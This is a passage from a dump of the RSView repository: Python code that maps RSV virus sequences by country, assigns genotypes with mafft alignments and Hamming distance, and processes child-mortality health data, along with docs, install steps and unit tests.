rsv_df['country'] = np.where(rsv_df['country'].str.contains('South Korea'), 'Korea',\n rsv_df['country'])\n rsv_df['country'] = np.where(rsv_df['country'].str.contains('Viet Nam'), 'Vietnam',\n rsv_df['country'])\n rsv_df['country'] = np.where(rsv_df['country'].str.contains('Laos'), 'Lao PDR',\n rsv_df['country'])\n\n #Only keep sequences with an assigned subtype\n rsv_df = rsv_df[rsv_df['subtype'].notnull()]\n\n return rsv_df\n\n\ndef count_types(rsv_df, jitter_dict, level, datadir, genotype_level='collapse'):\n \"\"\"\n Restructure the DataFrame so that each row indicates the total number of RSV sequences\n found in each country, each year, for each subtype or genotype (specified by the level argument)\n \"\"\"\n\n #use lat and long so datapoints can be jittered to show multiple subtypes\n #lat and long data from https://worldmap.harvard.edu/data/geonode:country_centroids_az8\n\n lat_lon = pd.read_csv(str(datadir)+'/country_centroids.csv',\n usecols=['name', 'brk_a3', 'Longitude', 'Latitude']\n ).rename(columns={'name':'country', 'brk_a3': 'country_code'})\n\n health_data = pd.read_csv(str(datadir)+HEALTHFILE, usecols=['Country/areaname', 'year',\n 'fufive9']).rename(columns={'Country/areaname': 'country',\n 'fufive9':'under_five_deaths'})\n\n #Level specified by required argument\n if level == 'subtype':\n #count number of rows(seqs) from each country that are each subtype\n df_group = pd.DataFrame({'count' : rsv_df.groupby(['country', 'subtype',\n 'year']).size()}).reset_index()\n\n #compile country-specific subtype count data with lat and long for plotting\n organized_df = df_group.merge(lat_lon, how='left', left_on='country', right_on='country')\n organized_df = organized_df.merge(health_data, how='left', left_on=['country', 'year'],\n right_on=['country', 'year'])\n\n elif level == 'genotype':\n #count number of rows(seqs) from each country that are each subtype\n genotype_subset = rsv_df[rsv_df['genotype'].notnull()]\n\n #genotype_level can be specified by an optional argument\n if genotype_level == 'collapse':\n df_group = pd.DataFrame(\n {'count' : genotype_subset.groupby(['country', 'subtype', 'genotype_group',\n 'year']).size()}).reset_index()\n else:\n df_group = pd.DataFrame(\n {'count' : genotype_subset.groupby(['country', 'subtype', 'genotype',\n 'year']).size()}).reset_index()\n\n #compile country-specific subtype count data with lat and long for plotting\n organized_df = df_group.merge(lat_lon, how='left', left_on='country', right_on='country')\n organized_df = organized_df.merge(health_data, how='left', left_on=['country', 'year'],\n right_on=['country', 'year'])\n\n #Jitter points for countries that have multiple subtypes, so markers on map don't overlap\n country_group = organized_df.groupby('country').size()\n\n\n #With data separated by year\n organized_df['adj_lon'] = np.where(country_group[organized_df['country']] > 1,\n (organized_df['Longitude']+organized_df.subtype.map(\n lambda x: jitter_dict[x])), organized_df['Longitude'])\n\n organized_df['adj_lat'] = np.where(country_group[organized_df['country']] > 1,\n (organized_df['Latitude']+organized_df.subtype.map(\n lambda x: jitter_dict[x])), organized_df['Latitude'])\n\n #Find any country names that don't match between sequence DF and lat/lon database\n if len(organized_df[organized_df['adj_lon'].isnull()]) != 0:\n print('Warning: the following country names do not match between sequence DataFrames and\\\n \"country_centroids.csv\"' +\n str(organized_df[organized_df['adj_lon'].isnull()]['country']))\n return organized_df\n\n\ndef map_rsv(organized_df, level, genotype_level='collapse', years=[1990, 2018]):\n \"\"\"\n Use ploy.ly to map RSV sequences onto a global map, with bubbles indicating the virus\n collection location. Bubbles are colored according to subtype or genotype (indicated by the\n level argument) and their size is proportional to the number of sequences collected from the\n given location. Maps are separated temporally by collection date and the slider at the bottom of\n the plot allows the user to scroll through time to see how RSV distribution changes over time.\n \"\"\"\n\n #years can specified by an optional argument\n if years == 'all':\n year_range = [yr for yr in range(int(organized_df.year.min()),\n int(organized_df.year.max()))]\n else:\n year_range = [yr for yr in range(years[0], years[1]+1)]\n\n #Set color scales: blues for 'A' viruses, reds for 'B'\n blues = plt.get_cmap('GnBu')\n reds = plt.get_cmap('OrRd')\n\n if level == 'subtype':\n type_list = ['A', 'B']\n cmap = {'A': colors.to_hex(blues(0.75)),\n 'B': colors.to_hex(reds(0.75))}\n\n elif level == 'genotype':\n #genotype_level can be specified by an optional argument\n if genotype_level == 'collapse':\n a_genotypes = list(set(organized_df[organized_df['subtype'] == 'A']\n ['genotype_group'].tolist()))\n b_genotypes = list(set(organized_df[organized_df['subtype'] == 'B']\n ['genotype_group'].tolist()))\n else:\n a_genotypes = list(set(organized_df[organized_df['subtype'] == 'A']\n ['genotype'].tolist()))\n b_genotypes = list(set(organized_df[organized_df['subtype'] == 'B']\n ['genotype'].tolist()))\n type_list = a_genotypes + b_genotypes\n\n cmap = {}\n for a_genotype in a_genotypes:\n cmap[a_genotype] = colors.to_hex(\n blues((a_genotypes.index(a_genotype)+1.0)/len(a_genotypes)))\n for b_genotype in b_genotypes:\n cmap[b_genotype] = colors.to_hex(\n reds((b_genotypes.index(b_genotype)+1.0)/len(b_genotypes)))\n\n scale_markers = 1\n map_list = []\n\n #Reassign level for collapsed genotypes so 'genotype_group' will be referenced during plotting\n if level == 'genotype':\n if genotype_level == 'collapse':\n level = 'genotype_group'\n\n #Make dictionaries for each point to be plotted on a plotly map\n for i in range(len(organized_df)):\n\n map_country = dict(\n type='scattergeo',\n lat=[organized_df.loc[i, 'adj_lat']],\n lon=[organized_df.loc[i, 'adj_lon']],\n marker=dict(\n size=[np.min([organized_df.loc[i, 'count']*scale_markers, 75])],\n sizemin=5,\n color=cmap[organized_df.loc[i, level]],\n line=dict(width=0.5, color='rgb(40,40,40)'),\n opacity=0.75,\n sizemode='diameter'),\n hovertext=(organized_df.loc[i, 'country'] + '<br>' + str(level) + ' ' +\n organized_df.loc[i, level] + ' : ' + str(organized_df.loc[i, 'count'])+\n ' sequences' + '<br>'+ 'Percent under 5 y.o. deaths due to Acute '\\\n 'Respirator Infection: ' + str(organized_df.loc[i, 'under_five_deaths'])),\n name=organized_df.loc[i, 'country']+' '+organized_df.loc[i, level],\n legendgroup=organized_df.loc[i, level],\n showlegend=False,\n hoverinfo='text'\n )\n map_list.append(map_country)\n\n #Work around for showing legend\n for subtype in type_list:\n subtype_legend = dict(\n type='scattergeo',\n lat=[180.0],\n lon=[180.0],\n marker=dict(\n size=scale_markers*10,\n color=cmap[subtype],\n opacity=0.5,\n sizemode='area'),\n legendgroup=subtype,\n name=str(level)+ ' ' + subtype,\n showlegend=True,\n hovertext=None,\n )\n map_list.append(subtype_legend)\n\n steps = []\n for year in year_range:\n step = dict(\n method='restyle',\n label=year,\n args=['visible', [False] * (len(organized_df)+len(type_list))])\n for i in range(len(organized_df)):\n if organized_df.loc[i, 'year'] == year:\n step['args'][1][i] = True # Toggle i'th year to \"visible\"\n for subtype in type_list:\n step['args'][1][(len(organized_df)+type_list.index(subtype))] = True\n steps.append(step)\n\n layout = dict(\n title='Global distribution of RSV',\n sliders=[dict(\n steps=steps, y=0.16)],\n geo=dict(\n scope='world',\n showland=True,\n landcolor='rgb(217, 217, 217)',\n countrywidth=1,\n ),\n legend=dict(x=1.02, y=0.75))\n\n fig = dict(data=map_list, layout=layout)\n\n py.plot(fig)\n return fig\n\ndef main(level, datadir, genotype_level, years):\n \"\"\"\n Run organize_data, count_types, map_rsv\n \"\"\"\n rsv_df = organize_data(datadir, GENOTYPE_DICT)\n organized_df = count_types(rsv_df, JITTER_DICT, level, datadir, genotype_level=genotype_level)\n map_rsv(organized_df, level, genotype_level=genotype_level, years=years)\n\nif __name__ == \"__main__\":\n\n PARSER = rsview.parsearguments.map_parser()\n ARGS = PARSER.parse_args()\n\n main(ARGS.level, ARGS.datadir, genotype_level=ARGS.genotype_level, years=ARGS.years)\n"
},
{
"alpha_fraction": 0.40833333134651184,
"alphanum_fraction": 0.40833333134651184,
"avg_line_length": 19,
"blob_id": "c6b852d6a15b9b71f82d0f72fbe43486c69754d6",
"content_id": "0b51a5a6da73a4007811b43bc568984b6923f82a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 120,
"license_type": "permissive",
"max_line_length": 32,
"num_lines": 6,
"path": "/docs/plot_correlation.rst",
"repo_name": "khdusenbury/RSView",
"src_encoding": "UTF-8",
"text": "=======================\n``plot_correlation.py``\n=======================\n\n.. automodule:: plot_correlation\n :members:\n"
},
{
"alpha_fraction": 0.5751574635505676,
"alphanum_fraction": 0.5874497294425964,
"avg_line_length": 36.33427810668945,
"blob_id": "d7408f54b559bd11eee8dc009dad815215814e28",
"content_id": "74c576cffa650e948778db3a1cbe8071eb244c94",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 13179,
"license_type": "permissive",
"max_line_length": 78,
"num_lines": 353,
"path": "/rsview/genotype.py",
"repo_name": "khdusenbury/RSView",
"src_encoding": "UTF-8",
"text": "\"\"\"Assign RSV G sequences genotypes.\n\nThis program relies on some seqs already being genotyped. It will\nonly add sequences to a genotype that already has a high quality\n(< 60 gaps in the alignment) sequence in the input data.\n\"\"\"\n\nimport time\nimport os\nimport glob\nimport subprocess\nimport pandas as pd\nfrom Bio import SeqIO\nimport rsview.parsearguments\n\n\n#GT_A and GT_B lists based on genotypes already known to be present.\nGT_A_LIST = ['ON1', 'GA1', 'GA2', 'GA3', 'GA5', 'GA6', 'GA7', 'NA1', 'NA2',\n 'NA3', 'SAA1', 'SAA2']\nGT_B_LIST = ['BA', 'BA2', 'BA4', 'BA5', 'BA7', 'BA8', 'BA9', 'BA10', 'BA11',\n 'BA12', 'BA14', 'THB', 'SAB1', 'SAB3', 'SAB4', 'GB1', 'GB2',\n 'GB3', 'GB4', 'GB13', 'GB12']\n\ndef hamming_distance(seq1, seq2):\n \"\"\"Return the Hamming distance between equal-length sequences.\"\"\"\n assert len(seq1) == len(seq2), \"Undefined for sequences of unequal length\"\n return sum(site1 != site2 for site1, site2 in zip(seq1, seq2))\n\n\ndef merge_csvs(csv_files):\n \"\"\"Merge given *csv_files* into one dataframe.\n\n Args:\n `csv_files` (list)\n list of .csv files to merge into dataframe\n \n Returns:\n `full_df` (dataframe)\n pandas dataframe containing data concatenated from csv_files\n \"\"\"\n file_frames = []\n for file in csv_files:\n if not os.path.isfile(file):\n raise ValueError('Sequence data not downloaded. Run '\\\n '`seq_download.py`.')\n file_df = pd.read_csv(file)\n file_frames.append(file_df)\n\n full_df = pd.concat(file_frames, ignore_index=True, sort=False)\n full_df.drop('Unnamed: 0', axis=1, inplace=True)\n\n return full_df\n\n\ndef seqstofastas(seqs_df, outfiles, full_len):\n \"\"\"\n Takes a dataframe containing sequence, subtype, and genotype info and\n outputs specified `.fasta` files.\n\n Args:\n `outfiles` (list)\n List of `.fasta` files to output. Expects 3 files:\n 1. Long G seqs already genotyped\n 2. Long G seqs not yet genotyped\n 3. All short G seqs\n\n `seqs_df` (dataframe)\n pandas dataframe containing sequence, subtype, and genotype info\n \"\"\"\n assert len(outfiles) == 3, 'Unexpected number of files to output.'\n\n lt_fasta = outfiles[0]\n l_fasta = outfiles[1]\n s_fasta = outfiles[2]\n\n with open(lt_fasta, 'w') as longtyped, \\\n open(l_fasta, 'w') as long_nogt, \\\n open(s_fasta, 'w') as short:\n for i in range(len(seqs_df)):\n stype = seqs_df.at[i, 'subtype']\n gtype = seqs_df.at[i, 'genotype']\n header = '>{0} {1} {2}\\n'.format(i, stype, gtype)\n seq = seqs_df.at[i, 'G_seq']\n if seq != 'NaN':\n if gtype != 'NaN':\n if len(seq) > full_len:\n longtyped.write('{0}{1}\\n'.format(header, seq))\n else:\n short.write('{0}{1}\\n'.format(header, seq))\n else:\n if len(seq) > full_len:\n long_nogt.write('{0}{1}\\n'.format(header, seq))\n else:\n short.write('{0}{1}\\n'.format(header, seq))\n\n\ndef alignseqs(infiles, outfiles):\n \"\"\"Use mafft to align RSV G sequences.\n\n Due to significant disparities in length, use a three step approach.\n 1. Align long G sequences with known genotypes\n 2. Add in all long G sequences using --add with --keeplength\n 3. Add in short G sequences using --addfragments with --keeplength\n\n Expects to align 1st infile and ouput to first outfile, then add 2nd\n infile and output as 2nd outfile, and finally add 3rd infile and output\n as 3rd outfile.\n \"\"\"\n\n assert len(infiles) == len(outfiles) == 3, 'Incorrect number of files '\\\n 'for i/o.'\n\n subprocess.check_call('mafft --auto {0} > {1}'.format(infiles[0],\n outfiles[0]), shell=True)\n\n subprocess.check_call('mafft --add {0} --reorder --keeplength {1} > {2}'\\\n .format(infiles[1], outfiles[0], outfiles[1]), shell=True)\n\n subprocess.check_call('mafft --addfragments {0} --reorder --6merpair '\\\n '--thread -1 --keeplength {1} > {2}'.format(infiles[2],\n outfiles[1], outfiles[2]), shell=True)\n\n\ndef getrefseqs(ltyped_alignment, full_alignment):\n \"\"\"From alignments, finds the longest sequences with genotype info.\n \n Args:\n `ltyped_alignment` (.fasta alignment)\n Alignment of long sequences with genotypes.\n Try to assign reference genotype sequences from these seqs first.\n \n `full_alignment` (.fasta alignment)\n Alignment of all sequences of interest.\n Look through these sequences for genotypes not found in the\n `ltyped_alignment` and assign them a reference sequence if there\n is a sequence of sufficient length (< 60 gaps compared to full).\n \n Returns:\n `gt_seqs` (dict)\n Dictionary of a reference sequence for each genotype already\n called in the data.\n\n \"\"\"\n gt_seqs = {}\n # Set reference seqs with long seqs first\n for record in SeqIO.parse(ltyped_alignment, 'fasta'):\n genotype_info = record.description.split(' ')\n if len(genotype_info) == 3:\n genotype = genotype_info[-1]\n elif len(genotype_info) == 4:\n genotype = genotype_info[2] + genotype_info[3]\n if genotype == 'BAIV':\n genotype = 'BA4'\n if genotype not in gt_seqs.keys():\n if 'X' not in str(record.seq): # No ambiguous amino acids\n gt_seqs[genotype] = str(record.seq)\n\n # Add ref seqs for genotypes with no 'long' seq\n added_gts = {}\n for record in SeqIO.parse(full_alignment, 'fasta'):\n genotype_info = record.description.split(' ')\n if len(genotype_info) == 3:\n if genotype_info[-1] != 'NaN':\n genotype = genotype_info[-1]\n elif len(genotype_info) == 4:\n genotype = genotype_info[2] + genotype_info[3]\n if genotype == 'BAIV':\n genotype = 'BA4'\n if genotype not in gt_seqs.keys(): #no full seq for gt\n if 'X' not in str(record.seq):\n if genotype not in added_gts.keys():\n added_gts[genotype] = [str(record.seq)]\n else:\n added_gts[genotype].append(str(record.seq))\n\n # Pick added reference seq with least number of gaps. Must have < 60.\n for added_gt in added_gts:\n possible_refs = added_gts[added_gt]\n gt_refseq = min(possible_refs, key=lambda seq: seq.count('-'))\n if gt_refseq.count('-') < 60:\n gt_seqs[added_gt] = gt_refseq\n\n return gt_seqs\n\ndef assign_gt(alignment, gt_refdict, hd_threshold):\n \"\"\"\n Assign a genotype to a non-genotyped sequence as long as the match\n meets a certain hamming distance threshold.\n \n Args:\n `alignment` (.fasta alignment)\n Alignment of all sequences (genotyped and non) to analyze.\n\n `gt_refdict` (dict)\n Dictionary of genotypes and reference sequences\n\n `hd_threshold` (int)\n Hamming distance threshold that sets the maximum number of \n mismatches allowed between a sequence and the most similar \n genotype reference sequence. If the minimum hamming distance\n between a sequence and its most similar reference sequence is \n greater than `hd_threshold`, the genotype will remain 'NaN'.\n\n Returns:\n `updated_gts` (list of tuples)\n List of df index and new genotype for sequences with new gt\n\n `mistyped` (int)\n Number of sequences that were mistyped using this genotyping \n method. Being mistyped means the method assigned them a \n genotype that did not agree with the downloaded subtype. \n These genotypes are reset to 'NaN'.\n\n \"\"\"\n\n updated_gts = []\n\n #Keep track of number seqs mistyped based on subtype/genotype disagreement\n mistyped = 0\n mistyped_info = []\n\n for record in SeqIO.parse(alignment, 'fasta'):\n genotype = record.description.split(' ')[2]\n subtype = record.description.split(' ')[1]\n seqindex = record.name\n # only add genotypes for seqs with subtypes so can check concordance\n if genotype == 'NaN' and subtype != 'NaN':\n gt_hds = {}\n for gtype in gt_refdict:\n gt_ref = gt_refdict[gtype]\n gt_hds[gtype] = hamming_distance(gt_ref, str(record.seq))\n # At least *hd_threshold* sites must match to call genotype.\n if min(gt_hds.values()) < (len(record.seq) - hd_threshold):\n new_gt = min(gt_hds, key=gt_hds.get)\n if record.description.split(' ')[1] == 'B':\n if new_gt not in GT_B_LIST:\n mistyped += 1\n mistyped_info.append((record.name, new_gt, 'B'))\n new_gt = 'NaN'\n\n elif record.description.split(' ')[1] == 'A':\n if new_gt not in GT_A_LIST:\n mistyped += 1\n mistyped_info.append((record.name, new_gt, 'A'))\n new_gt = 'NaN'\n\n updated_gts.append((seqindex, new_gt))\n\n return [updated_gts, mistyped, mistyped_info]\n\n\ndef main():\n \"\"\"Align downloaded sequences, call genotypes, and return final df\"\"\"\n\n parser = rsview.parsearguments.genotype_parser()\n args = vars(parser.parse_args())\n prog = parser.prog\n\n print(\"\\nExecuting {0} ({1}) in {2} at {3}.\\n\".format(\n prog, rsview.__version__, os.getcwd(), time.asctime()))\n\n files = [filename for filename in glob.glob('{0}*.csv'.format(\n args['inprefix']))]\n\n if not os.path.isdir('{0}'.format(args['seqsdir'])):\n os.makedirs('{0}'.format(args['seqsdir']))\n\n if not os.path.isdir('{0}'.format(args['outdir'])):\n os.makedirs('{0}'.format(args['outdir']))\n\n outfile = '{0}/RSVG_all_genotyped.csv'.format(args['outdir'])\n\n hd_threshold = args['threshold']\n full_length = args['full_length']\n\n print('Input files: {0}'.format(files))\n\n file_frames = []\n for file in files:\n if not os.path.isfile(file):\n raise ValueError('Sequence data not downloaded. Run '\\\n '`seq_download.py`.')\n file_df = pd.read_csv(file)\n file_frames.append(file_df)\n\n rsv_df = merge_csvs(files)\n\n seqs = rsv_df[['G_seq', 'genotype', 'subtype']]\n\n already_genotyped = sum(seqs['genotype'].value_counts())\n\n print('\\nStarting with {0} of {1} seqs genotyped.\\n'.format(\n already_genotyped, len(seqs)))\n\n seqs = seqs.fillna(value='NaN') #easily callable placeholder\n\n assert seqs.G_seq.map(len).max() >= full_length, 'No full length ' \\\n 'sequences. Cannot assign new genotypes.'\n\n #Establish files for seqs. Make 3 files for iterative alignment.\n longtyped_fasta = '{0}/G_seqs_longtyped.fasta'.format(args['seqsdir'])\n long_fasta = '{0}/G_seqs_long_nogt.fasta'.format(args['seqsdir'])\n short_fasta = '{0}/G_seqs_short.fasta'.format(args['seqsdir'])\n\n seqs_files = [longtyped_fasta, long_fasta, short_fasta]\n\n seqstofastas(seqs, seqs_files, full_length)\n\n # Establish files for alignments\n aligned_ltyped = '{0}/G_longtyped_aligned.fasta'.format(args['seqsdir'])\n aligned_long = '{0}/G_long_all_aligned.fasta'.format(args['seqsdir'])\n aligned_all = '{0}/G_all_aligned.fasta'.format(args['seqsdir'])\n\n alignment_files = [aligned_ltyped, aligned_long, aligned_all]\n\n # Make alignments\n alignseqs(seqs_files, alignment_files)\n\n # Set reference seqs for each genotype\n gt_refs = getrefseqs(aligned_ltyped, aligned_all)\n\n # Assign new genotypes and calculate number mistyped\n new_gt_info = assign_gt(aligned_all, gt_refs, hd_threshold)\n new_gts = new_gt_info[0]\n num_mistyped = new_gt_info[1]\n mismatches = new_gt_info[2]\n\n print(\"\\n{0} genotypes mistyped and reset to 'NaN'\".format(num_mistyped))\n print(\"Those mismathces were:\")\n for mismatch in mismatches:\n print(\"Seq: {0}. Assigned genotype: {1}. Mismatched with subtype: \"\\\n \"{2}. Reset to 'NaN'.\".format(mismatch[0], mismatch[1],\n mismatch[2]))\n print('\\n{0} genotypes added.'.format(len(new_gts) - num_mistyped))\n print(\"{0} seqs now genotyped.\".format(already_genotyped + len(new_gts)\n - num_mistyped))\n\n # Assign genotypes back to full dataframe\n for new_gt in new_gts:\n rsv_df.loc[int(new_gt[0]), 'genotype'] = new_gt[1]\n\n # Make a clean df with relevant columns and save as `.csv`\n clean_df = rsv_df[['collection_date', 'country', 'subtype', 'genotype', \\\n 'G_seq']]\n clean_df.to_csv(outfile)\n\n\nif __name__ == '__main__':\n START_TIME = time.time()\n main()\n END_TIME = time.time()\n print('Finished at {0}. Took {1:.3f} minutes to run.'.format(\n time.asctime(), (END_TIME - START_TIME)/60))\n"
},
{
"alpha_fraction": 0.6284437775611877,
"alphanum_fraction": 0.6437081098556519,
"avg_line_length": 31.7560977935791,
"blob_id": "d136c55ec7bac869dbc93e975da29e8f3f90af2d",
"content_id": "58eeb17cf1f4cb3768a15616076183f0acd025e4",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2686,
"license_type": "permissive",
"max_line_length": 86,
"num_lines": 82,
"path": "/rsview/health_download.py",
"repo_name": "khdusenbury/RSView",
"src_encoding": "UTF-8",
"text": "\"\"\" This module processes the raw health file and generates full and summary CSVs\nready to be loaded into a dataframe for plotting \"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport country_converter as coco\n\nfrom parsearguments import health_parser\n\n\n\ndef iso3_to_country(iso3):\n \"\"\" Take user input and convert it to the short version of the country name \"\"\"\n\n if iso3 == 'Global':\n return 'Global'\n country = coco.convert(names=iso3, to='name_short')\n return country\n\ndef main(datadir):\n \"\"\" Process raw health CSV and generate full and summary CSVs \"\"\"\n\n # need to change path to this csv\n df_orig = pd.read_csv(str(datadir) + '/health_data_RAW.csv')\n\n # change index to iso3 (3 letter country codes)\n df_orig.columns = df_orig.iloc[3]\n\n # remove spaces from columns names\n df_orig.columns = df_orig.columns.str.strip().str.replace(' ', '')\n\n # for NaN values in iso3, replace with 'Global'\n df_orig['iso3'] = df_orig['iso3'].replace(np.nan, 'Global', regex=True)\n\n # copy original dataframe, excluding blank lines\n df_with_na = df_orig[4:3319].copy()\n df_with_na.index = df_with_na['iso3']\n\n # remove entries with NaN or '-' values\n df_with_na = df_with_na.replace('-', np.nan)\n df_no_na = df_with_na.dropna(axis=0, how='any').fillna(0).copy()\n\n # remove % sign for fneo9, fpost9 and fufive9\n # '18' = 18%\n column_percents = ['fneo9', 'fpost9', 'fufive9']\n for i in column_percents:\n df_no_na[i] = df_no_na[i].str.rstrip('%').astype('float')\n\n\n column_numbers = [\n 'nnd', 'pnd', 'neo9', 'post9', 'ufive9', 'rneo9', 'rpost9', 'rufive9']\n for i in column_numbers:\n df_no_na[i] = df_no_na[i].str.strip().str.replace(',', '')\n\n df_no_na = df_no_na.replace('-', np.nan)\n df_clean = df_no_na.dropna(axis=0, how='any').fillna(0).copy()\n\n for i in column_numbers:\n df_clean[i] = df_clean[i].astype('float')\n\n df_clean.rename(columns={'Country/area name': 'country'}, inplace=True)\n\n # create summary dataframe to groupby iso3 and calculate the mean\n # note: maybe change to median??\n df_summary = df_clean.groupby(df_clean.index).mean().reset_index()\n\n df_summary[\"country_short\"] = [iso3_to_country(x) for x in df_summary.iso3.values]\n df_clean[\"country_short\"] = [iso3_to_country(x) for x in df_clean.iso3.values]\n\n outfile_all = str(datadir) + '/health_data_all.csv'\n outfile_summary = str(datadir) + '/health_data_summary.csv'\n\n # export full and summary dataframes to csv\n df_clean.to_csv(outfile_all)\n df_summary.to_csv(outfile_summary)\n\n\nif __name__ == \"__main__\":\n\n ARGS = health_parser().parse_args()\n\n main(ARGS.datadir)\n"
},
{
"alpha_fraction": 0.5652173757553101,
"alphanum_fraction": 0.582608699798584,
"avg_line_length": 37.33333206176758,
"blob_id": "e7306782876dea03c5674435b0abbb40ebf9c0d1",
"content_id": "cfcafe6872638dc3ee10705cda22a9a9e3dcf90c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 115,
"license_type": "permissive",
"max_line_length": 49,
"num_lines": 3,
"path": "/rsview/_metadata.py",
"repo_name": "khdusenbury/RSView",
"src_encoding": "UTF-8",
"text": "__version__ = '0.dev1'\n__url__ = 'https://github.com/khdusenbury/RSView'\n__author__ = 'Jilliane Bruffey, Kate Dusenbury, and Katie Kistler'\n"
},
{
"alpha_fraction": 0.375,
"alphanum_fraction": 0.375,
"avg_line_length": 13.666666984558105,
"blob_id": "68f3258bb4db11ee6a1fd2a71d91955f1791575d",
"content_id": "10eff6c469b264c41d568e20454141735d47eebf",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 88,
"license_type": "permissive",
"max_line_length": 24,
"num_lines": 6,
"path": "/docs/plot_rsv.rst",
"repo_name": "khdusenbury/RSView",
"src_encoding": "UTF-8",
"text": "===============\n``plot_rsv.py``\n===============\n\n.. automodule:: plot_rsv\n :members:\n"
},
{
"alpha_fraction": 0.7190684080123901,
"alphanum_fraction": 0.7248908281326294,
"avg_line_length": 39.411766052246094,
"blob_id": "38d77ccc4d378494986161046d6d3bb8d4a61ad6",
"content_id": "69f69d64faa15a33e5b3e381ae2ef6a585ec4ca9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 687,
"license_type": "permissive",
"max_line_length": 225,
"num_lines": 17,
"path": "/docs/Installation.rst",
"repo_name": "khdusenbury/RSView",
"src_encoding": "UTF-8",
"text": "============\nInstallation\n============\n\nTo install and run `rsview` perform the following steps:\n\n1. Clone the repo: git clone https://github.com/khdusenbury/RSView.git\n\n2. Create and activate the conda environment in the `environment.yml`:\n * `conda env create -f environment.yml`\n * `source activate rsview`\n\n3. Install `rsview` by running `python setup.py install` within the cloned ``RSView`` directory.\n\n4. Create a plot.ly account [here](https://plot.ly/). Follow [these](https://plot.ly/python/getting-started/#initialization-for-online-plotting) instructions for adding your plot.ly API key to your ~/.plotly/.credentials file\n\nModules can then be run based on user needs.\n"
},
{
"alpha_fraction": 0.5489230155944824,
"alphanum_fraction": 0.5646909475326538,
"avg_line_length": 33.48058319091797,
"blob_id": "e95993593d2f5956a333279b2ee72de1e6d618bf",
"content_id": "a3eeda2dd4af4ebf93bfa0b6ab51820482b9f396",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7103,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 206,
"path": "/rsview/tests/test_genotype.py",
"repo_name": "khdusenbury/RSView",
"src_encoding": "UTF-8",
"text": "\"\"\"Test rsview.genotype.py\n\nMust be run from within `tests` due to file paths.\n\"\"\"\nimport unittest\nimport os\nimport rsview.genotype as genotype\n\n\nSTR = 'MQGHQNCASSG'\nCSVS = ['../data/RSVG_gb_metadata_0-5000.csv',\n '../data/RSVG_gb_metadata_5000-10000.csv']\nCOLUMNS = ['G_seq', 'genotype', 'subtype', 'country', 'collection_date']\n\nTESTDIR = './testdata_genotype'\n\nSEQSDIR = '../data/seqs'\n\nTESTSEQS = [TESTDIR+'/seqs1.fasta', TESTDIR+'/seqs2.fasta',\n TESTDIR+'/seqs3.fasta']\n\nALIGNMENTS = [SEQSDIR+'/G_longtyped_aligned.fasta',\n SEQSDIR+'/G_long_all_aligned.fasta',\n SEQSDIR+'/G_all_aligned.fasta']\n\nGT_A_LIST = ['ON1', 'GA1', 'GA2', 'GA3', 'GA5', 'GA6', 'GA7', 'NA1', 'NA2',\n 'NA3', 'SAA1', 'SAA2']\nGT_B_LIST = ['BA', 'BA2', 'BA4', 'BA5', 'BA7', 'BA8', 'BA9', 'BA10', 'BA11',\n 'BA12', 'BA14', 'THB', 'SAB1', 'SAB3', 'SAB4', 'GB1', 'GB2',\n 'GB3', 'GB4', 'GB13', 'GB12']\n\nclass TestGenotyping(unittest.TestCase):\n \"\"\"\n Tests genotype.py\n \"\"\"\n\n def test_hamming_distance(self):\n \"\"\"Test get correct output and error from genotype.hamming_distance\"\"\"\n str1 = STR\n str2 = str1.replace('Q', 'T')\n self.assertEqual(genotype.hamming_distance(str1, str2),\n str1.count('Q'))\n\n with self.assertRaises(AssertionError):\n genotype.hamming_distance(str1, str1[2:])\n\n\n def test_merge_csvs(self):\n \"\"\"Test genotpe.merge_csvs gives right output df length\"\"\"\n merged_df = genotype.merge_csvs(CSVS)\n self.assertEqual(len(merged_df), 10000)\n\n for column in COLUMNS:\n self.assertTrue(column in list(merged_df))\n\n\n def test_seqstofastas(self):\n \"\"\"Test creation of fasta files.\n\n Test that function can be called.\n\n Test that files are made.\n\n Test those files have expected `.fasta` headings.\n \"\"\"\n # Assumes test_merge_csvs passed\n\n test_df = genotype.merge_csvs(CSVS)\n # Select columns and rid of 'nan', so all G_seqs are strs\n testseqsdf = test_df[['G_seq', 'genotype', 'subtype']].fillna('NaN')\n\n # Ensure some seqs will be \"full length\", so get seqs in all files\n testlength = testseqsdf.G_seq.map(len).max() - 20\n\n with self.assertRaises(AssertionError):\n genotype.seqstofastas(testseqsdf, TESTSEQS[:2], testlength)\n\n # Start with empty TESTDIR then test making expected files\n if os.path.isdir(TESTDIR):\n for seqfile in TESTSEQS:\n if os.path.isfile(seqfile):\n os.remove(seqfile)\n else:\n os.makedirs(TESTDIR)\n\n for seqfasta in TESTSEQS:\n self.assertFalse(os.path.isfile(seqfasta))\n\n genotype.seqstofastas(testseqsdf, TESTSEQS, testlength)\n\n for seqfasta in TESTSEQS:\n self.assertTrue(os.path.isfile(seqfasta))\n with open(seqfasta) as fasta:\n for line in fasta:\n if '>' in line:\n self.assertTrue(line[0] == '>')\n self.assertTrue(3 <= len(line.split(' ')) <= 4)\n self.assertTrue(line.split(' ')[1] in ['A', 'B', 'NaN'])\n\n\n def test_alignseqs(self):\n \"\"\"Test that alignseqs is called and outputs error if improper input.\n\n Not testing alignment by mafft as it is slow and mafft is supported\n elsewhere.\n\n Therefore, I will not test toy data, but will test processed data\n in `../data/seqs/` directory for appropriate headings.\n \"\"\"\n\n with self.assertRaises(AssertionError):\n genotype.alignseqs(TESTSEQS, ALIGNMENTS[:2])\n genotype.alignseqs(TESTSEQS[0], ALIGNMENTS[0])\n\n align_seq = ''\n lenprevseq = 0\n\n # Only run tests on output if such files exist.\n for alignment in ALIGNMENTS:\n if os.path.isfile(alignment):\n with open(alignment) as alignfile:\n for line in alignfile:\n if '>' in line:\n # Test all aligned seqs have appropriate headers\n self.assertTrue(line[0] == '>')\n 